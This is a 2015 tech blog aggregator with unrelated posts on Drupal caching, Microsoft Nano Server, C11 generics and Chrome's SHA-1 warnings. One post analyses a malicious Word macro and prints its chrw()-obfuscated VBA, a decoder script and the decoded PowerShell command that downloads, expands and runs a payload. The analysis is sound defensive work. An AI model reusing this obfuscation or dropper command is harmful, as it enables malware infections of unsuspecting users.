I just uploaded my LOADays 2015 slides to slideshare. The talk seems to have been well received; I got a number of positive comments from some attendees, which is always nice.

As an aside, during the talk I did a short demo of how to sign something from within Libreoffice using my eID card. Since the slides were made in Libreoffice Impress, the easiest thing to do was just to sign the slides themselves, which worked perfectly well. So, having uploaded, downloaded, and verified these slides, I can now say with 100% certainty that slideshare does not tamper with files you upload. They may reformat them so it's easier to view on a website, but if you click on the download link, you get the original, untampered version.

At least that's the case if you sign documents, of course; it's always possible that they check for that and special-case such things. Would surprise me, though.

April 12, 2015 11:36 AM

April 10, 2015

Frank Goossens

Music from Our Tube: Sylvan Esso does the hanky panky

The studio version of Sylvan Esso‘s “Coffee” had been in my YouTube favorites playlist for a couple of months already, but it’s the first song in this NPR’s Tiny Desk Concert and it’s just as great! Warning: slightly quirky dancing ahead. :-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at April 10, 2015 04:11 AM

April 09, 2015

Wim Leers

Drupal 8 now has page caching enabled by default

After more than a year and probably hundreds of patches, yesterday it finally happened! As of 13:11:56 CET, April 8, 2015, Drupal 8 officially has page caching enabled by default!1 And not the same page caching as in Drupal 7: this page cache is instantly updated when something is changed.

The hundreds of patches can be summarized very simply: cache tags, cache tags, cache tags. Slightly less simple: cacheability metadata is of vital importance in Drupal 8. Without it, we’d have to do the same as in Drupal 7: whenever content is created or a comment is posted, clear the entire page cache. Yes, that is as bad as it sounds! But without that metadata, it simply isn’t possible to do better.2

I’ve been working on this near-full time since the end of 2013 thanks to Acquia, but obviously I didn’t do this alone — so enormous thanks to all of you who helped!

This is arguably the biggest step yet to make Drupal Fast By Default. I hate slow sites with a passion, so you can probably see why I personally see this as a big victory :)

(One could argue you could just enable Drupal 7’s page cache, but there are 3 reasons why this is inferior to Drupal 8’s page cache: a) no instantaneous updates; b) any node or comment posted causes the entire page cache to be cleared (!), c) it’s not enabled by default: many users don’t know they should enable this. Sure, you can get similar performance, but you’ll have to give up certain things, which makes it an apples vs. oranges comparison.)


By default, Drupal 8 is now between 2 and 200 times faster than Drupal 7 for anonymous users: Drupal 8 will respond in constant time, for Drupal 7 it depends on the complexity of the page.

On my machine ( ab -c1 -n 1000, PHP 5.5.11, Intel Core i7 2.8 GHz, warm caches,):

Drupal 7

Drupal 8

Always 6.5 ms/request (154 requests/s)3.


The real beauty is that it’s a win-win: enterprise (Acquia), medium, small, tiny (hobbyist) all win:

So my work was sponsored by Acquia, but benefits everyone!

People have been expressing concerns that Drupal 8 has become too complex, that it doesn’t care about site builders anymore, that it is only for enterprises, etc. I think this is a good counterexample.
Yes, we added the complexity of cacheability metadata, but that only affects developers — for whom we have good documentation. And most importantly: site builders reap the benefits: they don’t even have to think about this anymore. Manually clearing caches is a thing of the past starting with Drupal 8!

Page cache is just a built-in reverse proxy

Drupal’s page cache is just a built-in reverse proxy. It’s basically “poormansvarnish”.

Drupal 8 bubbles all cacheability metadata up along the render tree, just like JavaScript events bubble up along the DOM tree. When it reaches the tree’s root, it also bubbles up to the response level, in the form of the X-Drupal-Cache-Tags header.

The page cache uses that header to know what cache tags it should be invalidated by. And because of that, other (“real”) reverse proxies can do exactly the same. The company behind Varnish even blogged about it. And CDNs are even starting to support this exact technique out of the box, for example Fastly.

Last but not least: all of Drupal 8’s integration tests use the page cache by default, which means all of our integration tests effectively verify that Drupal works correctly even if they’re behind a reverse proxy!

New possibilities for small sites (and shared hosting)

On one end of the spectrum, I see great shared hosting providers starting to offer Varnish even on their smallest plans. For example: Gandi offers Varnish on their €4/month plans. If users can configure Varnish — or even better, if they pre-configure Varnish to support Drupal 8’s cache tag-based invalidation — then almost all traffic will be handled by Varnish.

For 90% or more of all sites, this would quite simply be good enough: very cheap, very fast, very flexible.4

I can’t wait until we see the first hosting provider offering such awesome integration out of the box!

New possibilities for enterprise sites (and enterprise hosting)

On the other hand of the spectrum, enterprise hosting now gains the ability to invalidate (purge) all and only the affected pages on a CDN5. Without having to generate a list of URLs that a modified piece of content may appear on, and then purge those URLs. Without having to write lots of hooks to catch all the cases where said content is being modified.

At least equally important: it finally allows for caching content that previously was generated dynamically for every request, because it was a strong requirement that the information always be up-to-date6. With cache tag support, and strong guarantees that cache tags indeed are invalidated when necessary, such use cases now can cache the content and still be confident that updates will immediately propagate.

New possibilities for developers

Finally, the addition of cache tags and by extension, all render cacheability metadata (cache tags, contexts and max-age), allow for greater insight and tooling when analyzing hosting, infrastructure, performance and caching problems. Previously, you had to analyze/debug a lot of code to figure out why something that was cached was not being invalidated when appropriate by said code.

Because it’s now all standardized, we can build better tools — we can even automatically detect likely problems: suspiciously frequent cache tag invalidations, suspiciously many cache tags … (but also cache contexts that cause too many variations, too low or too high maximum ages …).

Next steps

Warm cache performance is now excellent, but only for anonymous users.

Next week, at Drupal Dev Days Montpellier, we’ll be working on improving Drupal 8’s cold cache performance (including bootstrap and routing performance). That will also help improve performance for authenticated users.

But we already have been working several weeks on improving performance for authenticated users. Together with the above, we should be able to outperform Drupal 7. This is the plan that Fabian Franz and I have been working towards:

  1. smartly caching partial pages for all users (including authenticated users): d.o/node/2429617, which requires cache contexts to be correct
  2. sending the dynamic, uncacheable parts of the page via a BigPipe-like mechanism: d.o/node/2429287

  1. That’s commit 25c41d0a6d7806b403a4c0c555f7dadea2d349f2

  2. In other words: all of this is made possible thanks to optimal cache invalidation. Yes, that quote

  3. We’re also working on making the page cache faster We made the page cache faster. We went down from 8.3 ms/request (120 requests/second) when this blog post was published on April 9, to 6.5 ms/request (154 requests/second) on April 17. It should be possible to achieve 5 ms/request, or 200 requests per second. Drupal 7 is still significantly faster though, at 2.5 ms/request (on my machine, see the Benchmark section). It’s likely Drupal 8 won’t be able to match that because the early bootstrapping is heavier. 

  4. And not something any other CMS offers as far as I know — if there is one, please leave a comment! 

  5. Keep an eye on the Purge module for Drupal 8. It will make it very easy to apply cache tag-based invalidation to self-hosted reverse proxies (Varnish, ngninx…), but also to put your entire site behind a CDN and still enjoy instantaneous invalidations! 

  6. You could already use #cache[expire] in Drupal 7, but in Drupal 8, the combination of #cache[max-age] and #cache[tags] means that you have both time-based invalidation and instantaneous tag-based invalidation. Whichever invalidation happens first, invalidates the cached data. And therefore: updates occur as expected. 

by Wim Leers at April 09, 2015 02:25 PM

Frank Goossens

ALA about Angulars shortcoming: it’s the server, stupid!

In “Let links be links” at A List Apart Ross Penman discusses some of the dangers of building single-page-apps that entirely rely on client-side JavaScript (using e.g. AngularJS or Ember) and more importantly proposes a solution;

When dynamic web page content is rendered by a server, rendering code only has to be able to run on that one server. When it’s rendered on a client, the code now has to work with every client that could possibly visit the website. […] If framework developers could put in the effort (which, admittedly, seems large) to get apps running in Node just as they run in the browser, initial page rendering could be handled by the server, with all subsequent activity handled by the browser. […] If this effort could be made at the outset by a framework maintainer, then every developer using that framework could immediately transform an app that only worked on the latest web browsers into a progressively enhanced experience compatible with virtually any web client—past, present, or future. […]

by frank at April 09, 2015 11:05 AM

April 08, 2015

Mattias Geniar

When Mailing Lists Turn Into Online Forums

The post When Mailing Lists Turn Into Online Forums appeared first on

Mailman 3.0 would introduce a powerful feature to turn mailing lists into online bulletin boards.

If you're into Open Source, chances are you've googled a problem and found a solution on an obscure website, filled with pre-formatted text that looks like it came from the '80s. Congratulations, you were helped by a mailing list archive.

The software responsible for running most of these mailing lists, Mailman, has a big update ready.

HyperKitty is a Django-based archiver application that replaces Pipermail. It provides a modern web interface to browse and search archived messages and threads.

Interestingly, it also allows users to post to discussions, so that by default users can interact with any Mailman mailing list as though it were a web forum, if they prefer.

The online demo looks impressive.


But I'm not convinced this is a move for the better.

I've often found a mailing list post after some Google searches, wanting to reply and spending several minutes searching for the mailing-list subscription, finding the right thread, ... Honestly, mailing lists are a bit of a mess.

But at the same time, they're not a forum. Not in the sense that we know them today. There are no (well: very little) trolls on mailing lists. Those who take the effort of signing up to a mailing list aren't doing it to curse at others or to be violent. They do so to stay informed, to interact and to help people.

I fear that turning our beloved mailing lists into online forums would mean the death of "mailing list quality posts" as we know it.

The post When Mailing Lists Turn Into Online Forums appeared first on

by Mattias Geniar at April 08, 2015 10:15 PM

Microsoft’s Nano Server & Hyper-V Containers

The post Microsoft’s Nano Server & Hyper-V Containers appeared first on

Holy cow, they're on a roll.

After embracing Open Source, they're taking the Windows Server OS to a whole new level. The kind of level I, as a Linux enthousiast, am glad to see.

Nano Server

[...] we removed the GUI stack, 32 bit support (WOW64), MSI and a number of default Server Core components. There is no local logon or Remote Desktop support. All management is performed remotely via WMI and PowerShell.

In addition to Server Core editions, Microsoft is announcing Nano Servers, an even more trimmed down version of the OS with only the needed tools to run your applications.

It's starting to look more like a Linux Kernel. A new version of Windows Server, without the bloat and lagginess that comes from the GUI management tools.

We are improving remote manageability via PowerShell with Desired State Configuration as well as remote file transfer, remote script authoring and remote debugging.

To manage the Nano Servers, they're investing more in Desired State Configuration, a Windows solution similar to Puppet or Chef's Config Management. DevOps all around.

Seriously, nice move.

Hyper-V Containers

The newly announced Nano Server is to Hyper-V Containers what CoreOS is to Docker. An OS as tiny as possible, built with one purpose: run containers.

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

Looks like we've got Docker containers on steroids, rebranded to Hyper-V containers.

The New Microsoft

It bears repeating: the Microsoft of the last year is one like we've never seen before. They're embracing Open Source, investing in the DevOps culture of automation via tools like Chocolatey, Desired State Configuration, Containers, ...

I've lost interest in the Microsoft stack in the last few years, but announcements like these force me to give Windows Server a new chance.

The post Microsoft’s Nano Server & Hyper-V Containers appeared first on

by Mattias Geniar at April 08, 2015 09:12 PM

Lionel Dricot

La liberté, c’est la poubelle !


Comment le développement logiciel m’a apprit à réfréner mes envies de consommation en jetant à la poubelle.

Il est tard, vous avez travaillé toute la journée, vous avez faim. Vous ouvrez le frigo : il contient divers récipients et une dizaine de produits variés. Non, décidément, rien. Vous vous résignez à commander une pizza.

C’est une journée importante. Vous voulez faire une bonne impression. Vous ouvrez votre garde-robe. Elle déborde. Deux t-shirts en tombent. Vous la refermez : non, décidément, vous n’avez plus rien à vous mettre. Il devient urgent d’aller au magasin. Et justement ce sont les soldes…

Le point commun de ces deux situations ? Le paradoxe du choix !

Bien connu des concepteurs de logiciels, le paradoxe du choix stipule qu’offrir des choix à l’utilisateur offre une mauvaise expérience. En effet, lorsque nous sommes confrontés à une décision, nous avons inconsciemment la conviction qu’il existe un meilleur choix. Nous ne voyons pas un choix comme une option mais bel et bien comme un test qui nous met au défi de retrouver la meilleure solution. Avec la crainte sous-jacente de ne pas choisir la bonne.

Le stress induit par le choix est particulièrement flagrant auprès des débutants en informatique : confrontés à une boîte de dialogue, ils paniquent au point d’être incapable de lire rationnellement. En désespoir de cause, ils ferment la boîte de dialogue en utilisant la croix afin d’éviter de faire un choix.

Ce stress du choix est omniprésent dans notre société de consommation. Des milliers de produits, des milliers de marques qui célèbrent « la liberté de choix ». Or, comme dit ci-dessus, cette liberté n’est que factice et est au contraire contraignante.

Face à tant de choix, nous préférons nous laisser guider, rôle rempli à merveille par la publicité. Plus subtilement, le fait d’avoir trop de choix au sein même de notre maison nous découragera, découragement que nous interpréterons comme un manque. Et qui nous poussera donc à remplir encore plus notre maison. Ce qui augmentera notre découragement et notre insatisfaction.

Plus nous achetons, plus nous possédons, plus nous éprouvons un manque et le besoin d’acheter !

Ayant pris conscience de cela, chaque fois que j’ai l’impression d’avoir un manque de vêtements, que j’éprouve le besoin d’acheter du neuf, je trie et je jette ou je porte à donner une grande partie (parfois jusqu’à la moitié) de mes vêtements existants. L’effet est saisissant : j’ai réellement l’impression d’avoir renouvelé ma garde-robe. Réduire mes choix me procure une impression paradoxale d’avoir désormais plus de choix.

Sans que nous nous soyons concertés, ma compagne a fait de même avec les armoires de la cuisine, jetant ce qui était périmé et non-mangeable, donnant ce que nous ne consommerions sans doute jamais, cuisinant ce qui était périmé mais mangeable. Le résultat a été également sans appel : nous avons beaucoup moins le besoin de commander ou de manger à l’extérieur. Le frigo, qui n’a jamais été aussi vide, contient toujours de quoi préparer un repas.

Jeter, c’est regagner sa liberté, ses choix ! Jeter est une véritable satisfaction et procure un réel sentiment de libération.

Par un amusant retour aux sources, j’ai réalisé que cette conclusion s’appliquait également… au développement logiciel ! J’ai vécu récemment l’exemple d’un client demandant à chaque fois des nouvelles fonctionnalités puis, après plusieurs mois, se plaignant que l’interface était trop complexe.

Il est facile de remettre la faute sur le client, de dire qu’il ne sait pas ce qu’il veut. Mais, au fond, nous sommes en tant qu’utilisateurs face à un logiciel comme face à un frigo ou une garde-robe : si nous éprouvons le besoin de rajouter une fonctionnalité, c’est que le logiciel en comporte trop. Il est temps de jeter des fonctionnalités, de le simplifier.

Finalement, faire des économies ou regagner sa liberté est assez simple : Jetez lorsque vous avez envie de consommer, simplifiez lorsque vous éprouvez le besoin de rendre complexe.

Jetez pour consommer moins !


Photo par Jes. Vous pourriez être également intéressé par la cueillette des biens matériels.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at April 08, 2015 05:19 PM

Mattias Geniar


The post Momentum appeared first on

Take joy in the little things of life, like the Momentum plugin in Chrome.

A personal greeting on a random high-res background for every tab you open in Chrome. Sounds like a performance drag, but it isn't.


Disable the default Focus, Quick Links, Todo, Weather, ... settings in the bottom left and just enjoy the peace and quiet of the image.


I love it.

The post Momentum appeared first on

by Mattias Geniar at April 08, 2015 12:45 PM

April 07, 2015

Wouter Verhelst

C11 function overloading

About four years ago, the ISO 9899:2011 "C11" standard was announced. At the time, I had a short look at (a draft version of) the standards document, and found a few interesting bits in there. Of course, however, due to it only very recently having been released, I did not have much hope of it being implemented to any reasonable amount anywhere yet. Which turned out to be the case. Even if that wasn't true, writing code that uses C11 features and expecting it to work just about anywhere else would have been a bad idea back then.

We're several years down the line now, however, and now the standard has been implemented to a reasonable extent in most compilers. GCC claims its "support [for C11] is at a similar level of completeness to (...) C99 support" since GCC 4.9.

Since my laptop has GCC 4.9, I looked at one feature in C11 that I have been wanting to use for a while: Generic selection.

#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

void say32(uint32_t i) {
    printf("32-bit variable: %" PRId32 "\n", i);

void say64(uint64_t i) {
    printf("64-bit variable: %" PRId64 "\n", i);

void sayother(int i) {
    printf("This is something else.\n");

#define say(X) _Generic((X), uint32_t: say32, uint64_t: say64, default: sayother)(X)

int main(void) {
    uint32_t v32 = 32;
    uint64_t v64 = 64;
    uint8_t v8 = 8;


Output of the above:

32-bit variable: 32
64-bit variable: 64
This is something else.

or, "precompiler-assisted function overloading for C". Should be useful for things like:

#define ntoh(X) _Generic((X), int16_t: ntohs, uint16_t: ntohs, int32_t: ntohl, uint32_t: ntohl)(X)
#define hton(X) _Generic((X), int16_t: ntohs, uint16_t: htons, int32_t: ntohl, uint32_t: htonl)(X)

... and if one adds the ntohll found here, it can do 64 bit as well.

April 07, 2015 10:12 PM

C11 operator overloading

C11 function overloading

About four years ago, the ISO 9899:2011 "C11" standard was announced. At the time, I had a short look at (a draft version of) the standards document, and found a few interesting bits in there. Of course, however, due to it only very recently having been released, I did not have much hope of it being implemented to any reasonable amount anywhere yet. Which turned out to be the case. Even if that wasn't true, writing code that uses C11 features and expecting it to work just about anywhere else would have been a bad idea back then.

We're several years down the line now, however, and now the standard has been implemented to a reasonable extent in most compilers. GCC claims its "support [for C11] is at a similar level of completeness to (...) C99 support" since GCC 4.9.

Since my laptop has GCC 4.9, I looked at one feature in C11 that I have been wanting to use for a while: Generic selection.

#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

void say32(uint32_t i) {
    printf("32-bit variable: %" PRId32 "\n", i);

void say64(uint64_t i) {
    printf("64-bit variable: %" PRId64 "\n", i);

void sayother(int i) {
    printf("This is something else.\n");

#define say(X) _Generic((X), uint32_t: say32, uint64_t: say64, default: sayother)(X)

int main(void) {
    uint32_t v32 = 32;
    uint64_t v64 = 64;
    uint8_t v8 = 8;


Output of the above:

32-bit variable: 32
64-bit variable: 64
This is something else.

or, "precompiler-assisted function overloading for C". Should be useful for things like:

#define ntoh(X) _Generic((X), int16_t: ntohs, uint16_t: ntohs, int32_t: ntohl, uint32_t: ntohl)(X)
#define hton(X) _Generic((X), int16_t: ntohs, uint16_t: htons, int32_t: ntohl, uint32_t: htonl)(X)

... and if one adds the ntohll found here, it can do 64 bit as well.

April 07, 2015 09:53 PM

Xavier Mertens

Malicious MS Word Document not Detected by AV Software

[This blogpost has also been published as a guest diary on]

Like everybody, I’m receiving a lot of spam everyday but… I like it! All unsocilited received messages are stored in a dedicated folder for two purposes:

This helps me to find new types of spams or new techniques used by attackers to deliver malicious content in our mailboxes. Today, I received an interesting Word document. I’m not sure if it is a very common one but I did a small analysis. The mail was based on a classic fake invoice notification:

From: Ollie Oconnor <>
To: xavier <xxx>
Subject: 49933-Your Latest Documents from RS Components 570009054

The fake invoice was related to which is a UK online shop for electronic devices, components and IT related stuffs. The attached Word document was processed by my MIME2VT tool but the VirusTotal score was 0/53! Interesting… It was too tempting to make some manual investigations. Using Didier Stevens’s tool oledump, I extracted the following macro:

$ ./ /tmp/20150331-A7740189461014146728299-1.doc
 1:      113 '\x01CompObj'
 2:     4096 '\x05DocumentSummaryInformation'
 3:     4096 '\x05SummaryInformation'
 4:     4096 '1Table'
 5:     4096 'Data'
 6:      490 'Macros/PROJECT'
 7:       65 'Macros/PROJECTwm'
 8: M  11613 'Macros/VBA/Module1'
 9: M   1214 'Macros/VBA/ThisDocument'
10:     2932 'Macros/VBA/_VBA_PROJECT'
11:     1165 'Macros/VBA/__SRP_0'
12:       70 'Macros/VBA/__SRP_1'
13:     8430 'Macros/VBA/__SRP_2'
14:      103 'Macros/VBA/__SRP_3'
15:      561 'Macros/VBA/dir'
16:     5684 'WordDocument'
$ ./ -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc
Attribute VB_Name = "Module1"
Sub sdfsdfdsf()
GVhkjbjv = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16) & chrw(23.5 + 23.5) & chrw(37.5 + 37.5) & chrw(16 + 16) & chrw(56 + 56) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(50.5 + 50.5) & chrw(57 + 57) & chrw(57.5 + 57.5) & chrw(52 + 52) & chrw(50.5 + 50.5) & chrw(54 + 54) & chrw(54 + 54) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(22.5 + 22.5) & chrw(34.5 + 34.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58.5 + 58.5) & chrw(58 + 58) & chrw(52.5 + 52.5) & chrw(55.5 + 55.5) & chrw(55 + 55) & chrw(40 + 40) & chrw(55.5 + 55.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(49.5 + 49.5) & chrw(60.5 + 60.5) & chrw(16 + 16) & chrw(49 + 49) & chrw(60.5 + 60.5) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(57.5 + 57.5) & chrw(57.5 + 57.5) & chrw(16 + 16)
GYUUYIiii = chrw(22.5 + 22.5) & chrw(55 + 55) & chrw(55.5 + 55.5) & chrw(56 + 56) & chrw(57 + 57) & chrw(55.5 + 55.5) & chrw(51 + 51) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(20 + 20) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(59.5 + 59.5) & chrw(22.5 + 22.5) & chrw(39.5 + 39.5) & chrw(49 + 49) & chrw(53 + 53) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58 + 58) & chrw(16 + 16) & chrw(41.5 + 41.5) & chrw(60.5 + 60.5) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(50.5 + 50.5) & chrw(54.5 + 54.5) & chrw(23 + 23) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(58 + 58) & chrw(23 + 23) & chrw(43.5 + 43.5) & chrw(50.5 + 50.5) & chrw(49 + 49) & chrw(33.5 + 33.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(50.5 + 50.5) & chrw(55 + 55) & chrw(58 + 58) & chrw(20.5 + 20.5) & chrw(23 + 23)
hgFYyhhshu = chrw(34 + 34) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(55 + 55) & chrw(54 + 54) & chrw(55.5 + 55.5) & chrw(48.5 + 48.5) & chrw(50 + 50) & chrw(35 + 35) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(20 + 20) & chrw(19.5 + 19.5) & chrw(52 + 52) & chrw(58 + 58) & chrw(58 + 58) & chrw(56 + 56) & chrw(29 + 29) & chrw(23.5 + 23.5) & chrw(23.5 + 23.5) & chrw(24.5 + 24.5) & chrw(28 + 28) & chrw(26.5 + 26.5) & chrw(23 + 23) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(24.5 + 24.5) & chrw(26 + 26) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(24.5 + 24.5) & chrw(23.5 + 23.5) & chrw(53 + 53) & chrw(57.5 + 57.5) & chrw(48.5 + 48.5) & chrw(60 + 60) & chrw(55.5 + 55.5) & chrw(28 + 28) & chrw(58.5 + 58.5) & chrw(23.5 + 23.5) & chrw(51.5 + 51.5) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(49 + 49) & chrw(25 + 25) & chrw(49.5 + 49.5) & chrw(60 + 60) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(19.5 + 19.5)
GYiuudsuds = chrw(22 + 22) & chrw(19.5 + 19.5) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(19.5 + 19.5) & chrw(20.5 + 20.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(55 + 55) & chrw(50 + 50) & chrw(16 + 16)
shdfihiof = chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23)
doifhsoip = chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(48.5 + 48.5) & chrw(57 + 57) & chrw(58 + 58) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5)
JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip
IUGuyguisdf = Shell(JHGUgisdc, 0)
End Sub

The macro is quite simple: a shell command is obfuscated by multiple chrw() functions to generate substrings which are concatenated and passwed to the Shell() function to be executed. Let’s write a small python script to decode this. I’m search for all occurences of chrw(), extract the values to create a new string:

import re
import sys
data =
r = re.compile('chrw\((\S+) \+ (\S+)\)')
i = re.findall(r, data)
cmd = ""
for match in i:
    cmd = cmd + chr(int(float(match[0]) + float(match[1]))
print cmd

Here is the result:

# ./ -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc | ./
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

The webserver being the IP address (located in Russia) is down at the moment… I’m keeping an eye on it…

by Xavier at April 07, 2015 06:27 PM

Mattias Geniar

Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure

The post Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure appeared first on

As announced in September 2014, Chrome version 42 will start to block mark SSL connections using the SHA-1 algorithm as insecure, with a big red cross in the browser.

Update #1: this article originally mentioned Chrome blocking SHA-1 certificates. Chrome will mark them as insecure, but won't actively block the connection. More in the post below.

Update #2: Chrome 42 is now the default and is auto-updated on all clients. SHA-1 certificates are now marked as insecure. (Chrome Release Blog: the Stable channel has been updated to 42.0.2311.87)

Chrome v42 is now publicly released. The browser now starts marking SSL certificates that still use the SHA-1 algorithm as insecure with a big red cross.

What is valid on Chrome 41, isn't on Chrome 42. The site is a prime example. Here's the site on Chrome 41.


That same site is showing SSL certificate errors on Chrome 42.


If you haven't already, check your certificates. If they're still using the SHA-1 algorithm, ask your SSL provider for a re-issue (hopefully free of charge) using a SHA-256. There are some additional rules on when SHA-1 certs are blocked shown as insecure, and when they aren't, depending on the expiration date.

The tl;dr: only SHA-1 certificates with a validation date > 2015 are reported as insecure.

The problem is, it's not only your certificate that needs to stop using SHA-1. Every intermediate needs to be updated as well. In the case of XKCD's site, their certificate was correctly using a SHA-256 algoritme, but their intermediate isn't.



Better check your certificate chains!

As I've said before, the chain of trust is only as strong as its weakest link.

The post Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure appeared first on

by Mattias Geniar at April 07, 2015 11:04 AM

Wim Leers

renderviz: tool visualizing Drupal 8's render tree

I’m working on making Drupal 8 faster as part of my job at Acquia. The focus has been on render caching12, which implies that cacheability metadata is of vital importance in Drupal 8.

To be able to render cache all things that can possibly be render cached, Drupal 8 code must:

Before Drupal 8, approximately zero attention was given to cacheability of the rendered content: everything seen on a Drupal 7 page is rendered dynamically, with only the occasional exception.

By flipping that around, we make developers more conscious about the output they’re generating, and how much time it takes to generate that output. This in turn allows Drupal 8 to automatically apply powerful performance optimizations, such as:

  1. enabling Drupal’s internal page cache (for anonymous users) by default: d.o/node/606840, which requires cache tags to be correct
  2. smartly caching partial pages for all users (including authenticated users): d.o/node/2429617, which requires cache contexts to be correct
  3. sending the dynamic, uncacheable parts of the page via a BigPipe-like mechanism: d.o/node/2429287

(The first of those three will likely happen this week. We’re working hard to make the last two a reality.)


Caching means better performance, but it also means that without the correct cacheability metadata, the wrong content may be served to end users: without the right cache contexts, the wrong variation may be sent to a user; without the right cache tags, stale content may be sent to a user. Therefore we should make it as easy as possible to analyze the cacheability of a rendered block, entity (node/user/taxonomy term/…), view, region, menu, and so on.

It should work not only for cacheability metadata, but for all bubbleable metadata3: it’d be very valuable to be able to see which part of the page caused an expensive cache context or tag 4, but it’d be at least equally valuable to see which part of the page attached a certain asset5.

Since bubbling happens across a tree, it’s important to visualize the hierarchy. The best hierarchy visualization I know in the web developer world is the Firefox Developer Tools 3D view.

Firefox 3D view of

I think a tool for visualizing, analyzing and understanding the bubbleable metadata (cache contexts, cache tags, cache max-age, assets) should work in a similar way. The developer should be able to:


So, over the past weekend, I worked on a prototype. I read the CSS Transforms spec6 and read a CSS 3D transforms introduction. As somebody with little CSS knowledge and not having touched CSS nor 3D programming in years, it was fun to play with this :) The result:

renderviz prototype, visualizing the 'timezone' cache context.

And finally, a short screencast demonstrating it in action:

Give it a try yourself by applying the attached patch to Drupal 8 at commit daf9e2c509149441d4d9a4d1964895179a84a12c and installing the renderviz module.

Want to help?

There are many rough edges — actually there are only rough edges. Everything needs work: CSS, JavaScript, UI (there isn’t any yet!), even the name!

But it’s a lot of fun to work on, and it’s very different from what most of us tend to work on every day. If you’d like to be able to build sites in Drupal 8 with a developer tool like this, please contact me, or leave a comment :)

  1. Avoiding to render exactly the same chunks of HTML endlessly on every request. See d.o/developing/api/8/render/arrays/cacheability

  2. For more about that, see the Render caching in Drupal 7 and 8 talk I did with Fabian Franz & Marco Molinari at DrupalCon Amsterdam. 

